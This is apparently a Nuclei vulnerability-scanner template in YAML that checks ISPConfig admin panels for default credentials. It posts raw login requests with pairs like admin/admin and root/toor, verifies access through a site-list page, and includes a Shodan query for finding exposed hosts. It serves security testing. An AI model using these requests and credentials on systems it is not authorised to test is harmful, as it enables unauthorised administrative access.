id: ispconfig-admin-default-login

info:
  name: ISPConfig Admin - Default Password
  author: pussycat0x
  severity: high
  description: |
    ISPConfig Admin Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
  metadata:
    verified: true
    max-request: 9
    shodan-query: "http.title:\"ispconfig\""
  tags: default-login,ispconfig

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Connection: close
        Referer: {{RootURL}}/login/

        username={{username}}&password={{password}}&s_mod=login&s_pg=index

      - |
        GET /sites/web_vhost_domain_list.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}/index.php

    attack: pitchfork
    payloads:
      username:
        - 'admin'
        - 'guest'
        - 'root'
      password:
        - 'admin'
        - 'password'
        - 'toor'

    stop-at-first-match: true
    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - Tools
          - Websites
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d6b386f2a5ed50224797fcd4250524c826eeafd029f6ea17c5a1e71f7797b9b10220489267e06c94623cdb6525196f596abf8261a2b427b66a048d93377297135f29:922c64590222798bb761d5b6d8e72950